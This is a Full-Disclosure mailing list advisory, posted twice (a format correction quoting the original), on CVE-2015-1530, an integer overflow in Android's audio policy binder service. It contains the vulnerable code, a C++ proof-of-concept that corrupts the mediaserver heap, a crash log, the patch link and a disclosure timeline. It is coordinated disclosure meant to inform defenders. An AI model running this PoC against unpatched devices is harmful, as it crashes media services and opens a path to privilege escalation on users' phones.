| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 12 Mar 2015 10:21:12 +0800
From: Guang Gong <higongguang@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] [CVE-2015-1530]An integer overflow in Android media could
be exploited to get media_server permission
Correct the format
#############################################################################
#
# QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
#
#############################################################################
#
# CVE ID: CVE-2015-1530
# Product: Android
# Vendor: Google
# Subject: An integer overflow in Android media could be exploited to get
media_server permission
# Effect: Gain privileges or cause a denial of service
# Author: Guang Gong
# Date: March 11th 2015
#
#############################################################################
Introduction
------------
An Integer overflow in the BnAudioPolicyService::onTransact function in
frameworks/av/media/libmedia/IAudioPolicyService.cpp in Android through 5.0
allow attackers to gain privileges or cause a denial of service (memory
corruption) via vectors that trigger a large number of count value.
Affected Android version
----------
all versions below Lollipop 5.1
Patches
-------
Android Bug id 18226810
https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160
Description
-----------
The vulnerable code is as follows.
http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661
case QUERY_DEFAULT_PRE_PROCESSING: {
656 CHECK_INTERFACE(IAudioPolicyService, data, reply);
657 int audioSession = data.readInt32();
658 uint32_t count = data.readInt32();
659 uint32_t retCount = count;
660 effect_descriptor_t *descriptors =
661 (effect_descriptor_t *)new char[count *
sizeof(effect_descriptor_t)];--------------------->count can be set to any
value by binder client, which can cause integer overflow and when write to
this buffer, heap corruption will happen.
662 status_t status = queryDefaultPreProcessing(audioSession,
descriptors, &retCount);
663 reply->writeInt32(status);
664 if (status != NO_ERROR && status != NO_MEMORY) {
665 retCount = 0;
666 }
667 reply->writeInt32(retCount);
Attack vector
-------------
A normal Apps can corrupt the heap in mediaserver by this vulnerabilities.
the PoC of corrupting the heap is as follows
#include <binder/Parcel.h>
#include <binder/ProcessState.h>
#include <binder/IServiceManager.h>
#include <media/IAudioPolicyService.h>
#include <binder/TextOutput.h>
#include <system/audio.h>
#include <sys/stat.h>
#include <fcntl.h>
using namespace android;
int main(__attribute__((unused)) int argc, __attribute__((unused)) char*
const argv[])
{
sp<IServiceManager> sm = defaultServiceManager();
sp<IBinder> service = sm->checkService(String16("media.audio_policy"));
sp<IAudioPolicyService> iPolicy =
IAudioPolicyService::asInterface(service);
effect_descriptor_t descriptors;
uint32_t count=0xfffffff;
iPolicy->getInput((audio_source_t)0,8000,(audio_format_t)1,AUDIO_CHANNEL_IN_FRONT,1);
iPolicy->queryDefaultPreProcessing(1,&descriptors,&count);
return 0;
}
the crash Log is as follows:
--------- beginning of crash
F/libc ( 184): new[] failed to allocate 3221225300 bytes
F/libc ( 184): Fatal signal 6 (SIGABRT), code -6 in tid 654 (Binder_1)
I/DEBUG ( 180): *** *** *** *** *** *** *** *** *** *** *** *** *** ***
*** ***
I/DEBUG ( 180): Build fingerprint:
'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
I/DEBUG ( 180): Revision: '10'
I/DEBUG ( 180): ABI: 'arm'
I/DEBUG ( 180): pid: 184, tid: 654, name: Binder_1 >>>
/system/bin/mediaserver <<<
I/DEBUG ( 180): signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr
--------
W/NativeCrashListener( 613): Couldn't find ProcessRecord for pid 184
I/DEBUG ( 180): Abort message: 'new[] failed to allocate 3221225300
bytes'
E/DEBUG ( 180): AM write failure (32 / Broken pipe)
I/DEBUG ( 180): r0 00000000 r1 0000028e r2 00000006 r3 00000000
I/DEBUG ( 180): r4 b46ffdb8 r5 00000006 r6 0000000c r7 0000010c
I/DEBUG ( 180): r8 0fffffff r9 000003f5 sl 000000b8 fp 00000001
I/DEBUG ( 180): ip 0000028e sp b46ffab8 lr b6f44941 pc b6f6676c
cpsr 60070010
I/DEBUG ( 180):
I/DEBUG ( 180): backtrace:
I/DEBUG ( 180): #00 pc 0003576c /system/lib/libc.so (tgkill+12)
I/DEBUG ( 180): #01 pc 0001393d /system/lib/libc.so
(pthread_kill+52)
I/DEBUG ( 180): #02 pc 000143e7 /system/lib/libc.so (raise+10)
I/DEBUG ( 180): #03 pc 00010e8d /system/lib/libc.so
(__libc_android_abort+36)
I/DEBUG ( 180): #04 pc 0000f954 /system/lib/libc.so (abort+4)
I/DEBUG ( 180): #05 pc 00012225 /system/lib/libc.so
(__libc_fatal+16)
I/DEBUG ( 180): #06 pc 000128fd /system/lib/libc.so (operator
new[](unsigned int)+16)
I/DEBUG ( 180): #07 pc 00056367 /system/lib/libmedia.so
(android::BnAudioPolicyService::onTransact(unsigned int, android::Parcel
const&, android::Parcel*, unsigned int)+1158)
I/DEBUG ( 180): #08 pc 000167a5 /system/lib/libbinder.so
(android::BBinder::transact(unsigned int, android::Parcel const&,
android::Parcel*, unsigned int)+60)
I/DEBUG ( 180): #09 pc 0001aea3 /system/lib/libbinder.so
(android::IPCThreadState::executeCommand(int)+562)
I/DEBUG ( 180): #10 pc 0001afbf /system/lib/libbinder.so
(android::IPCThreadState::getAndExecuteCommand()+38)
I/DEBUG ( 180): #11 pc 0001b001 /system/lib/libbinder.so
(android::IPCThreadState::joinThreadPool(bool)+48)
I/DEBUG ( 180): #12 pc 0001ee93 /system/lib/libbinder.so
I/DEBUG ( 180): #13 pc 0000e97d /system/lib/libutils.so
(android::Thread::_threadLoop(void*)+112)
I/DEBUG ( 180): #14 pc 0000e505 /system/lib/libutils.so
I/DEBUG ( 180): #15 pc 00013133 /system/lib/libc.so
(__pthread_start(void*)+30)
I/DEBUG ( 180): #16 pc 0001120b /system/lib/libc.so
(__start_thread+6)
I/DEBUG ( 180):
I/DEBUG ( 180): Tombstone written to: /data/tombstones/tombstone_00
I/BootReceiver( 613): Copying /data/tombstones/tombstone_00 to DropBox
(SYSTEM_TOMBSTONE)
Milestones
----------
Date Comment
Sender
03/11/2014 Initial Report of CVE-2015-1530
Qihoo
08/11/2014 have validated and have created a suitable fix internally
Google
11/11/2014 Sent the Android Bug ID 18226810
Google
10/2/2015 Sent the CVE-ID
Google
11/3/2015 Lollipop 5.1 was released, disclose it
Qihoo
References
----------
[1]
https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160
[2]
http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661
On Wed, Mar 11, 2015 at 8:39 PM, Guang Gong <higongguang@...il.com> wrote:
>
> #############################################################################
> #
> # QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
> #
>
> #############################################################################
> #
> # CVE ID: CVE-2015-1530
> # Product: Android
> # Vendor: Google
> # Subject: An integer overflow in Android media could be exploited to
> get media_server permission
> # Effect: Gain privileges or cause a denial of service
> # Author: Guang Gong
>
> # Date: March 11th 2015
> #
>
> #############################################################################
>
>
> Introduction
> ------------
> An Integer overflow in the BnAudioPolicyService::onTransact function in
> frameworks <http://androidxref.com/4.4.4_r1/xref/frameworks/>/av
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/>/media
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/>/libmedia
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/>/
> IAudioPolicyService.cpp
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp>
> in Android through 5.0 allow attackers to gain privileges or cause a denial
> of service (memory corruption) via vectors that trigger a large number of
> count value.
>
> Affected Android version
> ----------
>
> all versions below Lollipop 5.1
>
> Patches
> -------
>
> Android Bug id 18226810
>
> https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160
>
>
>
> Description
> -----------
> The vulnerable code is as follows.
>
>
> http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661
>
> case QUERY_DEFAULT_PRE_PROCESSING
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#QUERY_DEFAULT_PRE_PROCESSING>:
> {
>
> 656
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#656>
> CHECK_INTERFACE
> <http://androidxref.com/4.4.4_r1/s?defs=CHECK_INTERFACE&project=frameworks>
> (IAudioPolicyService
> <http://androidxref.com/4.4.4_r1/s?defs=IAudioPolicyService&project=frameworks>
> , data <http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks>,
> reply <http://androidxref.com/4.4.4_r1/s?defs=reply&project=frameworks>);
>
> 657
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#657>
> int audioSession
> <http://androidxref.com/4.4.4_r1/s?refs=audioSession&project=frameworks> =
> data <http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks>.
> readInt32
> <http://androidxref.com/4.4.4_r1/s?defs=readInt32&project=frameworks>();
>
> 658
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#658>
> uint32_t
> <http://androidxref.com/4.4.4_r1/s?defs=uint32_t&project=frameworks> count
> <http://androidxref.com/4.4.4_r1/s?refs=count&project=frameworks> = data
> <http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks>.readInt32
> <http://androidxref.com/4.4.4_r1/s?defs=readInt32&project=frameworks>();
>
> 659
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#659>
> uint32_t
> <http://androidxref.com/4.4.4_r1/s?defs=uint32_t&project=frameworks>
> retCount
> <http://androidxref.com/4.4.4_r1/s?refs=retCount&project=frameworks> =
> count <http://androidxref.com/4.4.4_r1/s?defs=count&project=frameworks>;
>
> 660
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#660>
> effect_descriptor_t
> <http://androidxref.com/4.4.4_r1/s?defs=effect_descriptor_t&project=frameworks>
> *descriptors
> <http://androidxref.com/4.4.4_r1/s?refs=descriptors&project=frameworks> =
>
> 661
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661>
> (effect_descriptor_t
> <http://androidxref.com/4.4.4_r1/s?defs=effect_descriptor_t&project=frameworks>
> *)new char[count
> <http://androidxref.com/4.4.4_r1/s?defs=count&project=frameworks> * sizeof
> (effect_descriptor_t
> <http://androidxref.com/4.4.4_r1/s?defs=effect_descriptor_t&project=frameworks>
> )];--------------------->count can be set to any value by binder client,
> which can cause integer overflow and when write to this buffer, heap
> corruption will happen.
>
> 662
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#662>
> status_t
> <http://androidxref.com/4.4.4_r1/s?defs=status_t&project=frameworks>
> status <http://androidxref.com/4.4.4_r1/s?refs=status&project=frameworks>
> = queryDefaultPreProcessing
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#queryDefaultPreProcessing>
> (audioSession
> <http://androidxref.com/4.4.4_r1/s?defs=audioSession&project=frameworks>,
> descriptors
> <http://androidxref.com/4.4.4_r1/s?defs=descriptors&project=frameworks>, &
> retCount
> <http://androidxref.com/4.4.4_r1/s?defs=retCount&project=frameworks>);
>
> 663
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#663>
> reply
> <http://androidxref.com/4.4.4_r1/s?defs=reply&project=frameworks>->
> writeInt32
> <http://androidxref.com/4.4.4_r1/s?defs=writeInt32&project=frameworks>(
> status <http://androidxref.com/4.4.4_r1/s?defs=status&project=frameworks>
> );
>
> 664
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#664>
> if (status
> <http://androidxref.com/4.4.4_r1/s?defs=status&project=frameworks> !=
> NO_ERROR
> <http://androidxref.com/4.4.4_r1/s?defs=NO_ERROR&project=frameworks> &&
> status <http://androidxref.com/4.4.4_r1/s?defs=status&project=frameworks>
> != NO_MEMORY
> <http://androidxref.com/4.4.4_r1/s?defs=NO_MEMORY&project=frameworks>) {
>
> 665
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#665>
> retCount
> <http://androidxref.com/4.4.4_r1/s?defs=retCount&project=frameworks> = 0;
>
> 666
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#666>
> }
>
> 667
> <http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#667>
> reply
> <http://androidxref.com/4.4.4_r1/s?defs=reply&project=frameworks>->
> writeInt32
> <http://androidxref.com/4.4.4_r1/s?defs=writeInt32&project=frameworks>(
> retCount
> <http://androidxref.com/4.4.4_r1/s?defs=retCount&project=frameworks>);
>
>
> Attack vector
> -------------
> A normal Apps can corrupt the heap in mediaserver by this vulnerabilities.
>
> the PoC of corrupting the heap is as follows
>
> #include <binder/Parcel.h>
>
> #include <binder/ProcessState.h>
>
> #include <binder/IServiceManager.h>
>
> #include <media/IAudioPolicyService.h>
>
> #include <binder/TextOutput.h>
>
> #include <system/audio.h>
>
> #include <sys/stat.h>
>
> #include <fcntl.h>
>
>
>
>
>
> using namespace android;
>
> int main(__attribute__((unused)) int argc, __attribute__((unused)) char*
> const argv[])
>
> {
>
> sp<IServiceManager> sm = defaultServiceManager();
>
> sp<IBinder> service = sm->checkService(String16("media.audio_policy"));
>
>
> sp<IAudioPolicyService> iPolicy =
> IAudioPolicyService::asInterface(service);
>
> effect_descriptor_t descriptors;
>
> uint32_t count=0xfffffff;
>
> iPolicy->getInput((audio_source_t)0,8000,(audio_format_t)1,AUDIO_CHANNEL_IN_FRONT,1);
>
>
> iPolicy->queryDefaultPreProcessing(1,&descriptors,&count);
>
> return 0;
>
> }
>
> the crash Log is as follows:
>
> --------- beginning of crash
>
> F/libc ( 184): new[] failed to allocate 3221225300 bytes
>
> F/libc ( 184): Fatal signal 6 (SIGABRT), code -6 in tid 654 (Binder_1)
>
> I/DEBUG ( 180): *** *** *** *** *** *** *** *** *** *** *** *** *** ***
> *** ***
>
> I/DEBUG ( 180): Build fingerprint:
> 'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
>
> I/DEBUG ( 180): Revision: '10'
>
> I/DEBUG ( 180): ABI: 'arm'
>
> I/DEBUG ( 180): pid: 184, tid: 654, name: Binder_1 >>>
> /system/bin/mediaserver <<<
>
> I/DEBUG ( 180): signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr
> --------
>
> W/NativeCrashListener( 613): Couldn't find ProcessRecord for pid 184
>
> I/DEBUG ( 180): Abort message: 'new[] failed to allocate 3221225300
> bytes'
>
> E/DEBUG ( 180): AM write failure (32 / Broken pipe)
>
> I/DEBUG ( 180): r0 00000000 r1 0000028e r2 00000006 r3 00000000
>
> I/DEBUG ( 180): r4 b46ffdb8 r5 00000006 r6 0000000c r7 0000010c
>
> I/DEBUG ( 180): r8 0fffffff r9 000003f5 sl 000000b8 fp 00000001
>
> I/DEBUG ( 180): ip 0000028e sp b46ffab8 lr b6f44941 pc b6f6676c
> cpsr 60070010
>
> I/DEBUG ( 180):
>
> I/DEBUG ( 180): backtrace:
>
> I/DEBUG ( 180): #00 pc 0003576c /system/lib/libc.so (tgkill+12)
>
> I/DEBUG ( 180): #01 pc 0001393d /system/lib/libc.so
> (pthread_kill+52)
>
> I/DEBUG ( 180): #02 pc 000143e7 /system/lib/libc.so (raise+10)
>
> I/DEBUG ( 180): #03 pc 00010e8d /system/lib/libc.so
> (__libc_android_abort+36)
>
> I/DEBUG ( 180): #04 pc 0000f954 /system/lib/libc.so (abort+4)
>
> I/DEBUG ( 180): #05 pc 00012225 /system/lib/libc.so
> (__libc_fatal+16)
>
> I/DEBUG ( 180): #06 pc 000128fd /system/lib/libc.so (operator
> new[](unsigned int)+16)
>
> I/DEBUG ( 180): #07 pc 00056367 /system/lib/libmedia.so
> (android::BnAudioPolicyService::onTransact(unsigned int, android::Parcel
> const&, android::Parcel*, unsigned int)+1158)
>
> I/DEBUG ( 180): #08 pc 000167a5 /system/lib/libbinder.so
> (android::BBinder::transact(unsigned int, android::Parcel const&,
> android::Parcel*, unsigned int)+60)
>
> I/DEBUG ( 180): #09 pc 0001aea3 /system/lib/libbinder.so
> (android::IPCThreadState::executeCommand(int)+562)
>
> I/DEBUG ( 180): #10 pc 0001afbf /system/lib/libbinder.so
> (android::IPCThreadState::getAndExecuteCommand()+38)
>
> I/DEBUG ( 180): #11 pc 0001b001 /system/lib/libbinder.so
> (android::IPCThreadState::joinThreadPool(bool)+48)
>
> I/DEBUG ( 180): #12 pc 0001ee93 /system/lib/libbinder.so
>
> I/DEBUG ( 180): #13 pc 0000e97d /system/lib/libutils.so
> (android::Thread::_threadLoop(void*)+112)
>
> I/DEBUG ( 180): #14 pc 0000e505 /system/lib/libutils.so
>
> I/DEBUG ( 180): #15 pc 00013133 /system/lib/libc.so
> (__pthread_start(void*)+30)
>
> I/DEBUG ( 180): #16 pc 0001120b /system/lib/libc.so
> (__start_thread+6)
>
> I/DEBUG ( 180):
>
> I/DEBUG ( 180): Tombstone written to: /data/tombstones/tombstone_00
>
> I/BootReceiver( 613): Copying /data/tombstones/tombstone_00 to DropBox
> (SYSTEM_TOMBSTONE)
>
>
>
> Milestones
> ----------
>
> Date
>
> Comment
>
> Sender
>
> 03/11/2014
>
> Initial Report of CVE-2015-1530
>
> Qihoo
>
> 08/11/2014
>
> have validated and have created a suitable fix internally
>
> Google
>
> 11/11/2014
>
> Sent the Android Bug ID 18226810
>
> Google
>
> 10/2/2015
>
> Sent the CVE-ID
>
> Google
>
> 11/3/2015
>
> Lollipop 5.1 was released, disclose it
>
> Qihoo
>
>
>
> References
> ----------
> [1]https:
> //android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160
>
> [2]
> http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661
>
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists